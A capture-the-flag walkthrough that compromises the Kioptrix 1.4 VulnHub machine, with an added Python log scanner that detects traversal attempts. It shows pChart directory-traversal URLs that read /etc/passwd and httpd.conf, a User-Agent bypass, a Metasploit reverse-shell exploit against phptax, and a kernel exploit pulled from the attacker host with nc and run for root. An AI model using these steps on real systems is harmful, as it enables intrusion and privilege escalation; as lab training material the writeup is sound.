VulnHub Writeup : Kioptrix Level 1.4 (#5)

Box Stats:

Box Information   Details
Box Name          Kioptrix Level 1.4
Series            Kioptrix
Release Date      6 Apr 2014
Author            Kioptrix
Difficulty        Easy
Download Link     Link

Network Scan

The IP of the target VM is 192.168.1.159. Perform an nmap scan on the target:

$ nmap -sV --top-ports 1000 192.168.1.159 -oN nmap.txt

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-26 16:38 EDT
Nmap scan report for 192.168.1.159
Host is up (0.00050s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.54 seconds

As we can see, ports 80 and 8080 are open. The web server on port 80 only shows the default "It works!" page, but the page source contains a commented-out part that points to a pChart link.

Opening http://192.168.1.159/pchart2.1.3/index.php shows a pChart application hosted on port 80.

A Google search shows that pChart 2.1.3 has XSS and directory traversal vulnerabilities; the directory traversal can be exploited by accessing the link below:

http://192.168.1.159/pchart2.1.3/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
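A defender's counterpart to the traversal request above (and to the httpd.conf read further down), added here and not part of the original writeup or of pChart itself: the kind of check the application should have applied to its Script parameter, plus a scan of constructed Apache access-log lines that flags the requests which would escape the web root. The install path, the log lines and the parameter handling are assumptions for this example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines (client IP, timestamps and sizes are made
# up); only the request shapes mirror the writeup, plus a double-encoded variant.
SAMPLE_LOG = """\
192.168.1.6 - - [26/Oct/2021:16:40:01 -0400] "GET /pchart2.1.3/index.php?Action=View&Script=examples/example.basic.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.6 - - [26/Oct/2021:16:41:12 -0400] "GET /pchart2.1.3/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.6 - - [26/Oct/2021:16:42:30 -0400] "GET /pchart2.1.3/index.php?Action=View&Script=%252e%252e%2f%252e%252e%2fusr/local/etc/apache2x/httpd.conf HTTP/1.1" 200 9000 "-" "Mozilla/4.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded dots (%252e) are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_script(base_dir, script):
    """The check the application should make: the resolved path if the Script
    value stays inside base_dir, else None (absolute paths are refused outright)."""
    candidate = fully_unquote(script).replace("\\", "/")
    if candidate.startswith("/"):
        return None
    base = base_dir.rstrip("/")
    # normpath collapses '..' segments, so an escaping path loses the base prefix.
    resolved = posixpath.normpath(posixpath.join(base, candidate))
    if resolved != base and not resolved.startswith(base + "/"):
        return None
    return resolved


def traversal_attempts(log_text, base_dir="/usr/local/www/pchart2.1.3"):
    """Return (line_no, decoded Script value) for each logged request whose Script
    parameter would escape the pChart directory (base_dir is an assumed path)."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        for script in parse_qs(query).get("Script", []):  # parse_qs decodes once
            if resolve_script(base_dir, script) is None:
                hits.append((line_no, fully_unquote(script)))
    return hits
```

Running `traversal_attempts(SAMPLE_LOG)` flags lines 2 and 3 only; the first, legitimate request resolves inside the assumed pChart directory and is left alone.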

At this point we cannot do much with this vulnerability, so let's check port 8080.

It says access forbidden. But thanks to the directory traversal vulnerability we can read the Apache httpd.conf file, and since we know the OS is FreeBSD, the httpd.conf file should be at /usr/local/etc/apache2x/httpd.conf. Let's try to access it:

http://192.168.1.159/pchart2.1.3/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache2x/httpd.conf

The picture above shows the last lines of the httpd.conf file, which indicate that the web server checks the browser User-Agent and only allows access to the application on port 8080 if the User-Agent is Mozilla/4.0.

So we have to change the browser User-Agent to Mozilla/4.0. For that we install the User Agent Switcher add-on in Firefox and then try to access the service running on port 8080.

Add "Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8" to Kioptrix5

Now enable the custom user agent and open http://192.168.1.159:8080

The phptax app is hosted at http://192.168.1.159:8080/phptax/. A Google search shows that phptax has a remote code execution vulnerability, and there is also a Metasploit module for it, so we are going to use Metasploit.

msf6 > use exploit/multi/http/phptax_exec
msf6 exploit(multi/http/phptax_exec) > set RHOSTS 192.168.1.159
RHOSTS => 192.168.1.159
msf6 exploit(multi/http/phptax_exec) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/phptax_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/http/phptax_exec) > set lhost 192.168.1.6
lhost => 192.168.1.6
msf6 exploit(multi/http/phptax_exec) > exploit

[*] Started reverse TCP double handler on 192.168.1.6:4444
[*] 192.168.1.159:8080 - Sending request...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo y6th2VULrYqot44x;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command: echo jVPGdJKnv4d3Y4jP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Connected: not found\r\nEscape: not found\r\njVPGdJKnv4d3Y4jP\r\n"
[*] Reading from socket B
[*] B: "y6th2VULrYqot44x\r\n"
[*] Matching...
[*] A is input...
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.6:4444 -> 192.168.1.159:25038) at 2021-10-27 16:06:00 -0400

[*] Command shell session 2 opened (192.168.1.6:4444 -> 192.168.1.159:35833) at 2021-10-27 16:06:00 -0400
whoami
www
id
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

For privilege escalation there is a kernel exploit for FreeBSD 9.0 available on Exploit-DB. First download the exploit to the attacker machine, then send the exploit code to the target machine, compile it, and run it there.

We are going to use nc to send the exploit to the target machine:

wget https://www.exploit-db.com/download/26368 -O exploit.c
nc -lvvp 8888 < exploit.c

The nc listener is now listening on port 8888. To download the file on the target machine, just connect back to the attacker machine:

nc 192.168.1.6 8888 > exploit.c

It may take a few seconds to download. Then compile and run the exploit:

gcc exploit.c -o exploit
exploit.c:89:2: warning: no newline at end of file
./exploit
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)
whoami
root

And as we can see, we have root access to the machine.
